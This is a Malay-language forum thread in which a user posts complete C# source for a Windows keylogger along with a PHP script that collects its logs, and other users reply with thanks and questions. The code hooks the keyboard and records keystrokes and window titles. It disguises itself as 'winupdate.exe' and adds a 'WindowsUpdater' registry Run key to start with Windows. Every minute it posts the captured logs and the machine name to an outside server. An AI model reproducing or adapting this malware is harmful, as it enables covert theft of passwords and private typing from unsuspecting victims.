Thread Rating:
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
[C#][SRC] Keylogger + PHP
25-02-2010, 09:45 PM,
Post: #1
[C#][SRC] Keylogger + PHP
ni keylogger yg aku develop, bukan dari scratch.. function keylogger tu aku dpt snippet dari google, so aku kembangkan function kat tempat dia detect atau terjemah oem key kepada simbol yang betul dan lain2 benda mcm dapatkan nama active window ke dlm log.. pastu tambah timer, startup. logger dia dalam PHP. Semua masih basic, study la code ni, buat la apa2 yang patut.

Untuk bahagian PHP, aku buat simple je, lepas dia dapat data dari keylogger, dia akan create logfile dalam folder php. Jangan lupa create folder log dan chmod 777. Kalau korg faham konsep php ni, korg nak buat cara lain pun boleh, nak buat siap ade login screen mcm iStealer pun boleh je. Kalau faham apa2 pun boleh buat.

Aku nak share code ni, kalau aku simpan pun tak guna. Takde maknanya simpan ilmu utk sorang2. Lagi satu, tak payah nak bagi kredit ke pape kat aku, I dont need it. Guna je, edit la suka2 hati.

Happy Ripping.. ;)

C#
Code:
using System;
using System.Diagnostics;
using System.Timers;
using System.Windows.Forms;
using System.Runtime.InteropServices;
using System.IO;
using System.Text;
using System.Net;
using Microsoft.Win32;

namespace Keylogger
{
    static class appstart
    {
        public static string path = System.IO.Path.GetTempPath()+"/temp2435.txt";
        public static byte caps = 0, shift = 0, failed = 0;

        public static void startup()
        {

            if (File.Exists(Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "winupdate.exe")))
            {
                //nothing
            }
            else
            {
                File.Copy(Application.ExecutablePath.ToString(), Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "winupdate.exe"));
            }
            //startup
            RegistryKey rkApp = Registry.CurrentUser.OpenSubKey(@"SOFTWARE\Microsoft\Windows\CurrentVersion\Run", true);

            if (rkApp.GetValue("WindowsUpdater") == null)
            {
                rkApp.SetValue("WindowsUpdater", Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "winupdate.exe").ToString());
            }
            rkApp.Close();
        }

        static string ProgramFilesx86() //tak guna pun, saje semak code ni kat sini :D
        {
            if (8 == IntPtr.Size
                || (!String.IsNullOrEmpty(Environment.GetEnvironmentVariable("PROCESSOR_ARCHITEW6432"))))
            {
                return Environment.GetEnvironmentVariable("ProgramFiles(x86)");
            }

            return Environment.GetEnvironmentVariable("ProgramFiles");
        }

        static public string EncodeTo64(string toEncode)
        {

            byte[] toEncodeAsBytes = System.Text.ASCIIEncoding.ASCII.GetBytes(toEncode);
            string returnValue = System.Convert.ToBase64String(toEncodeAsBytes);
            return returnValue;

        }

        private static string HttpPost(string URI, string Parameters)
        {
            System.Net.WebRequest req = System.Net.WebRequest.Create(URI);

            req.ContentType = "application/x-www-form-urlencoded";
            req.Method = "POST";

            byte[] bytes = System.Text.Encoding.ASCII.GetBytes(Parameters);
            req.ContentLength = bytes.Length;

            System.IO.Stream os = req.GetRequestStream();
            os.Write(bytes, 0, bytes.Length);
            os.Close();

            System.Net.WebResponse resp = req.GetResponse();
            if (resp == null) return null;

            System.IO.StreamReader sr = new System.IO.StreamReader(resp.GetResponseStream());
            return sr.ReadToEnd().Trim();
        }

        public static void OnTimedEvent(object source, EventArgs e)
        {

            /*string logdata = EncodeTo64(System.IO.File.ReadAllText(appstart.path)); */
            string logdata = System.IO.File.ReadAllText(appstart.path);
            string namapc = System.Environment.MachineName;
            //string logstatus = new System.Net.WebClient().DownloadString(("http://enigmy.com/testlog/data.php?nama=" + namapc + "&data=" + logdata));
            string logstatus = HttpPost("http://enigmy.com/testlog/data.php", "namapc=" + namapc + "&logdata=" + logdata);
            if (logstatus == "ok")
            {
                File.WriteAllText(appstart.path, ""); //empties the file
            }
        } //end of the OnTimedEvent method
    }//end of the appstart class

    static class GlobalClass
    {
        private static string m_globalVar = "";

        public static string namawindow
        {
            get { return m_globalVar; }
            set { m_globalVar = value; }
        }
    }

    class InterceptKeys
    {
        private const int WH_KEYBOARD_LL = 13;
        private const int WM_KEYDOWN = 0x0100;
        private static LowLevelKeyboardProc _proc = HookCallback;
        private static IntPtr _hookID = IntPtr.Zero;

        public static void Main()
        {
            _hookID = SetHook(_proc);
            appstart.startup();
            System.Timers.Timer timer;
            timer = new System.Timers.Timer();
            timer.Elapsed += new ElapsedEventHandler(appstart.OnTimedEvent);
            timer.AutoReset = true;
            timer.Interval = 60000; //60 saat
            timer.Start();
            Application.Run();
            GC.KeepAlive(timer);
            UnhookWindowsHookEx(_hookID);
        }

        private static IntPtr SetHook(LowLevelKeyboardProc proc)
        {
            using (Process curProcess = Process.GetCurrentProcess())
            using (ProcessModule curModule = curProcess.MainModule)
            {
                return SetWindowsHookEx(WH_KEYBOARD_LL, proc, GetModuleHandle(curModule.ModuleName), 0);
            }
        }

        private static string GetActiveWindowTitle()
        {
            const int nChars = 256;
            IntPtr handle = IntPtr.Zero;
            StringBuilder Buff = new StringBuilder(nChars);
            handle = GetForegroundWindow();

            if (GetWindowText(handle, Buff, nChars) > 0)
            {
                return Buff.ToString();
            }
            return null;
        }


        private delegate IntPtr LowLevelKeyboardProc(int nCode, IntPtr wParam, IntPtr lParam);

        private static IntPtr HookCallback(int nCode, IntPtr wParam, IntPtr lParam)
        {
            if (nCode >= 0 && wParam == (IntPtr)WM_KEYDOWN)
            {
                StreamWriter sw = File.AppendText(appstart.path);
                int vkCode = Marshal.ReadInt32(lParam);
                if (Keys.Shift == Control.ModifierKeys) appstart.shift = 1;
                string curwindow = GetActiveWindowTitle();

                if (GetActiveWindowTitle() != GlobalClass.namawindow)
                {
                    sw.WriteLine("");
                    sw.WriteLine("-----------------------------------------------");
                    sw.WriteLine("<[" + GetActiveWindowTitle() + "]>");
                    GlobalClass.namawindow = GetActiveWindowTitle();
                }

                switch ((Keys)vkCode)
                {
                    case Keys.Space:
                        sw.Write(" ");
                        break;
                    case Keys.Return:
                        sw.WriteLine("");
                        break;
                    case Keys.Back:
                        sw.Write("[BACK]");
                        break;
                    case Keys.Tab:
                        sw.Write("[TAB]");
                        break;
                    case Keys.D0:
                        if (appstart.shift == 0) sw.Write("0");
                        else sw.Write(")");
                        break;
                    case Keys.D1:
                        if (appstart.shift == 0) sw.Write("1");
                        else sw.Write("!");
                        break;
                    case Keys.D2:
                        if (appstart.shift == 0) sw.Write("2");
                        else sw.Write("@");
                        break;
                    case Keys.D3:
                        if (appstart.shift == 0) sw.Write("3");
                        else sw.Write("#");
                        break;
                    case Keys.D4:
                        if (appstart.shift == 0) sw.Write("4");
                        else sw.Write("$");
                        break;
                    case Keys.D5:
                        if (appstart.shift == 0) sw.Write("5");
                        else sw.Write("%");
                        break;
                    case Keys.D6:
                        if (appstart.shift == 0) sw.Write("6");
                        else sw.Write("^");
                        break;
                    case Keys.D7:
                        if (appstart.shift == 0) sw.Write("7");
                        else sw.Write("&");
                        break;
                    case Keys.D8:
                        if (appstart.shift == 0) sw.Write("8");
                        else sw.Write("*");
                        break;
                    case Keys.D9:
                        if (appstart.shift == 0) sw.Write("9");
                        else sw.Write("(");
                        break;
                    case Keys.LShiftKey:
                        sw.Write("[LSHFT]");
                        break;
                    case Keys.RShiftKey:
                        sw.Write("[RSHFT]");
                        break;
                    case Keys.LControlKey:
                        sw.Write("[LCTRL]");
                        break;
                    case Keys.RControlKey:
                        sw.Write("[RCTRL]");
                        break;
                    case Keys.LMenu:
                    case Keys.RMenu:
                    case Keys.LWin:
                    case Keys.RWin:
                    case Keys.Apps:
                        sw.Write("");
                        break;
                    case Keys.OemQuestion:
                        if (appstart.shift == 0) sw.Write("/");
                        else sw.Write("?");
                        break;
                    case Keys.OemOpenBrackets:
                        if (appstart.shift == 0) sw.Write("[");
                        else sw.Write("{");
                        break;
                    case Keys.OemCloseBrackets:
                        if (appstart.shift == 0) sw.Write("]");
                        else sw.Write("}");
                        break;
                    case Keys.Oem1:
                        if (appstart.shift == 0) sw.Write(";");
                        else sw.Write(":");
                        break;
                    case Keys.Oem7:
                        if (appstart.shift == 0) sw.Write("'");
                        else sw.Write('"');
                        break;
                    case Keys.Oemcomma:
                        if (appstart.shift == 0) sw.Write(",");
                        else sw.Write("<");
                        break;
                    case Keys.OemPeriod:
                        if (appstart.shift == 0) sw.Write(".");
                        else sw.Write(">");
                        break;
                    case Keys.OemMinus:
                        if (appstart.shift == 0) sw.Write("-");
                        else sw.Write("_");
                        break;
                    case Keys.Oemplus:
                        if (appstart.shift == 0) sw.Write("=");
                        else sw.Write("+");
                        break;
                    case Keys.Oemtilde:
                        if (appstart.shift == 0) sw.Write("`");
                        else sw.Write("~");
                        break;
                    case Keys.Oem5:
                        sw.Write("|");
                        break;
                    case Keys.Capital:
                        if (appstart.caps == 0) appstart.caps = 1;
                        else appstart.caps = 0;
                        break;
                    default:
                        if (appstart.shift == 0 && appstart.caps == 0) sw.Write(((Keys)vkCode).ToString().ToLower());
                        if (appstart.shift == 1 && appstart.caps == 0) sw.Write(((Keys)vkCode).ToString().ToUpper());
                        if (appstart.shift == 0 && appstart.caps == 1) sw.Write(((Keys)vkCode).ToString().ToUpper());
                        if (appstart.shift == 1 && appstart.caps == 1) sw.Write(((Keys)vkCode).ToString().ToLower());
                        break;
                } //end of switch
                appstart.shift = 0;
                sw.Close();
            }
            return CallNextHookEx(_hookID, nCode, wParam, lParam);
        } //end of HookCallback method

        [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
        private static extern IntPtr SetWindowsHookEx(int idHook, LowLevelKeyboardProc lpfn, IntPtr hMod, uint dwThreadId);

        [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
        [return: MarshalAs(UnmanagedType.Bool)]
        private static extern bool UnhookWindowsHookEx(IntPtr hhk);

        [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
        private static extern IntPtr CallNextHookEx(IntPtr hhk, int nCode, IntPtr wParam, IntPtr lParam);

        [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
        private static extern IntPtr GetModuleHandle(string lpModuleName);

        [DllImport("user32.dll")]
        static extern IntPtr GetForegroundWindow();

        [DllImport("user32.dll")]
        static extern int GetWindowText(IntPtr hWnd, StringBuilder text, int count);


    }
}

PHP
Code:
<?php

    $namapc = $_POST['namapc'];
    //$data = base64_decode($_POST['logdata']);
$data = htmlspecialchars($_POST['logdata']);


    
    if (isset($_POST['namapc'])) {
        $f = fopen("log/".$namapc."_".time().".txt", "w");
        fwrite($f, $data);
        fclose($f);
        echo "ok";
    }
?>
[Image: GteM3.png]
Reply
25-02-2010, 10:28 PM,
Post: #2
RE: [C#][SRC] Keylogger + PHP
nice code suhz...thx for sharing.. Big Grin
Reply
25-02-2010, 11:47 PM,
Post: #3
RE: [C#][SRC] Keylogger + PHP
nice..good job...
Reply
25-02-2010, 11:47 PM,
Post: #4
RE: [C#][SRC] Keylogger + PHP
mekasih suhz.....
X_X Lulz
lg banyak aku tau..lg banyak yg aku x dapat buat...
Reply
26-02-2010, 09:22 AM,
Post: #5
RE: [C#][SRC] Keylogger + PHP
suhz boleh tengok-tengokkan keylogger aku nie??
http://www.mediafire.com/?znzegdd0mgz
keylogger aku antar log ke dalam email cam x betol Lulz
huruf sumer tunggang langgang

[Image: 17930_3.jpg]
Pmr are bust*d GayFace


Reply
26-02-2010, 10:30 AM,
Post: #6
RE: [C#][SRC] Keylogger + PHP
+ 1 utk suhz for this opensos kod..Smile
thnx..
Reply
26-02-2010, 11:15 AM,
Post: #7
RE: [C#][SRC] Keylogger + PHP
yea....nice code share shuz...Big Grin

thx...Big Grin
Code:
I am not a hacker. I am a kind pirate. I did not act with a destructive aim... I wanted to warn them, to show up the faults in the system," the Sky News quoted the Frenchman as saying.



Reply
08-03-2010, 03:27 PM,
Post: #8
RE: [C#][SRC] Keylogger + PHP
tungang langang sebab x da hooks
Kot..try tgk blik...ni ada hooks x?
i WaNnA bE a PrOgRaMeR
Reply
08-03-2010, 03:42 PM,
Post: #9
RE: [C#][SRC] Keylogger + PHP
(08-03-2010, 03:27 PM)aka Wrote: tungang langang sebab x da hooks
Kot..try tgk blik...ni ada hooks x?

ok Big Grin

[Image: 17930_3.jpg]
Pmr are bust*d GayFace


Reply
08-03-2010, 04:22 PM,
Post: #10
RE: [C#][SRC] Keylogger + PHP
(08-03-2010, 03:27 PM)aka Wrote: tungang langang sebab x da hooks
Kot..try tgk blik...ni ada hooks x?

hooks apa? aku noob, mmg tak phm bahasa2 high tech.. tlg explain.

kalau ko kata keyboard hooks.. itulah KEYBOARD HOOK buka mata ko luas2. tengok code tu betul2.
[Image: GteM3.png]
Reply
08-03-2010, 04:38 PM,
Post: #11
RE: [C#][SRC] Keylogger + PHP
(08-03-2010, 04:22 PM)suhz Wrote:
(08-03-2010, 03:27 PM)aka Wrote: tungang langang sebab x da hooks
Kot..try tgk blik...ni ada hooks x?

hooks apa? aku noob, mmg tak phm bahasa2 high tech.. tlg explain.

kalau ko kata keyboard hooks.. itulah KEYBOARD HOOK buka mata ko luas2. tengok code tu betul2.

err..
dia reply post aku ker ko???

[Image: 17930_3.jpg]
Pmr are bust*d GayFace


Reply
08-03-2010, 04:42 PM,
Post: #12
RE: [C#][SRC] Keylogger + PHP
(08-03-2010, 04:38 PM)mr lock Wrote: err..
dia reply post aku ker ko???
dia tak quote pun post mana dia reply.. so aku assume dia bercakap mengenai Post no 1. ni pun thread pasal aku punye soskod.. so ikut jela..

setel. GayFace
[Image: GteM3.png]
Reply
10-01-2011, 02:26 AM, (This post was last modified: 10-01-2011, 06:53 AM by Joey.)
Post: #13
RE: [C#][SRC] Keylogger + PHP
this is a project in Windows Forms? I pasted this code on my project and some errors appeared:

http://i52.tinypic.com/14jrlae.jpg

Why?

sorry for my bad english, I'm from Brazil.
Reply


Possibly Related Threads...
Thread Author Replies Views Last Post
  [C#] [SRC] simple keylogger + gmailer suhz 8 1,053 31-12-2013, 09:23 PM
Last Post: keyoren

Forum Jump: